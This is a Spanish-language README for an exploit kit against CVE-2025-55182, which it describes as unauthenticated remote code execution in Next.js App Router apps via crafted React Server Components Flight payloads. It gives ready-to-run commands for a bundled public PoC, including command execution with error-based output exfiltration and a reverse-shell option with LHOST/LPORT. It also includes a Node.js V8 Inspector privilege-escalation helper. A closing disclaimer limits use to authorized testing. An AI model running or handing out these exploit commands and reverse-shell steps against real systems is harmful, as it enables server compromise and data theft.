
Exploit independiente para CVE-2025-55182 que logra RCE no autenticado en Next.js App Router mediante la deserialización Flight de React Server Components, con shell inversa y asistente de escalada de privilegios Node.js V8 Inspector.
Exploit independiente para CVE-2025-55182 en aplicaciones Next.js App Router que habilitan React Server Components. Payloads RSC Flight manipulados enviados al endpoint de server-action permiten ejecución remota de código sin autenticación. Incluye un helper de escalada de privilegios local de Node.js V8 Inspector (puerto de depuración) que ejecuta código en un proceso privilegiado mediante una evasión de sandbox con process.mainModule.require.
CVE: CVE-2025-55182
python3 -m pip install requests # para los PoC(s) en Python
cdp_privesc.pypython3 cdp_privesc.py <objetivo>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # exfiltración de comandos basada en errores
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py es el PoC público de CVE-2025-55182 de p3ta00, incluido sin cambios
desde https://github.com/p3ta00/react2shell-poc para una cadena autocontenida.
cdp_privesc.py (la escalada de privilegios local de Node.js V8 Inspector) es original.
Solo para pruebas de seguridad autorizadas y fines educativos. Ejecútalo únicamente contra sistemas que poseas o para los que tengas permiso escrito explícito para probar.
Autor: r3vpwnx